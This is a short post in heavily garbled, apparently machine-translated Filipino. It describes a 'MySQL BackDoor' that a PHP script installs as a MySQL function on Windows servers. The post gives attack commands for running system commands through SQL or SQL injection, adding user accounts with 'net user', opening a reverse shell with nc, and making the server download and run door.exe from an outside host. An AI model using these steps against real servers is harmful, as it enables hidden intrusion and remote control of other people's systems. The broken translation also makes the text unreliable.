MySQL BackDoor
Source: Puri Manchester
Ang MySQL BackDoor ay isang likod na pinto para sa pagpapaunlad ng server sa PHP + MySQL para sa MySQL pagkatapos sa likod na pinto upang i-install magdagdag ng "estado" ang function ay maaaring execute command sistema, at magsimula sa ang MySQL proseso batay sa dll sniffer ang uri ng likod ng pinto, cleverly maisasakatuparan walang port, walang proseso, walang mga serbisyo sa pamamagitan ng Trojan pader. programa sa ang WINXP WIN2003 ang + MYSQL5.0.X, at sa ilalim ng pass.
Install ay Mysql.php sa kumalat sa PHP sa server, ayon sa punan ang Host gumagamit Password-DB, i-click sa "auto-install ang MySQL BackDoor"
Matapos ang matagumpay na pag-install, MySQL ay nadagdagan sa pamamagitan ng isang function na "estado", habang ang proseso ng MySQL ay nagpapatakbo ng isang sniffing sa likod na pinto ng backdoor na ito sa Windows ay ang parehong pribilehiyo ng sistema at MySQL.
Ang paggamit ng mga function ng estado
Estado ng function ay talagang isang PHP sistema () "function na ang parehong function na maaaring ay ginamit upang isakatuparan utos sistema Mangyaring ipasok ang SQL utos:." Office at punan ang MySQL pahayag na ay pinaandar, tulad bilang "piliin ang estado (" ang net nohack gumagamit / idagdag ang "), i-click ang" Ipatupad ang SQL pahayag ay magpatakbo ng mga resulta.
Sa function na ng estado na batay singhot sa likod na pinto, kahit na kung Nawalang WebShell, hangga't ang mga server, point SQL iniksyon, maaari naming sa pamamagitan ng iniksyon. Php? Id = 1 at estado ('net user') "paraan executes sa server ? ang command Gayunpaman, kung ang iniksyon punto ay hindi ito kami pa rin tumawag singhutin ang likod na pinto control server ipinadala sa anumang port ng server at bukas na ang MySQL-"simula ng ang packet, ay hindi magagawang upang tawagan ang singhutin ang likod na pinto, tulad ng.:
Isang tumatakbo utos sistema: ng NC ang ip 80 -> Ipasok -> MySQL-cmd / c ang net user abc / add> c :/ log.txt, (Tandaan: "!" Ang huling Hindi na tinanggal)
2 20,082 port ng shell sa lokal na server ng bounce: unang labas NC-ang lp 20 082 upang masubaybayan ang 20,082 port ang machine, at pagkatapos ng NC ang ip 80 -> Ipasok -> MySQL-c -> Ipasok
Hayaan ang pag-download ng server: ng NC ip 80 -> Ipasok -> MySQL-http :/ / www.x.com ang / door.exe-ng c mydoor.exe (Tandaan:! Huling "Hindi na tinanggal)
Bilang karagdagan sa pagpapadala ng "MySQL-c-", ang iba pang mga utos ay walang echo, ngunit ang mga kaukulang command sa server tumatakbo.
Uninstall ang MySQL sa ang run "estado drop function na" ay maaaring diskargado, ngunit sa parehong panahon ay magiging sanhi ng MySQL proseso sa lumabas, bumalik sa normal pagkatapos ng reboot.










































150 Trackback (s)
Kailangan mong naka-log in upang mag-post ng isang puna.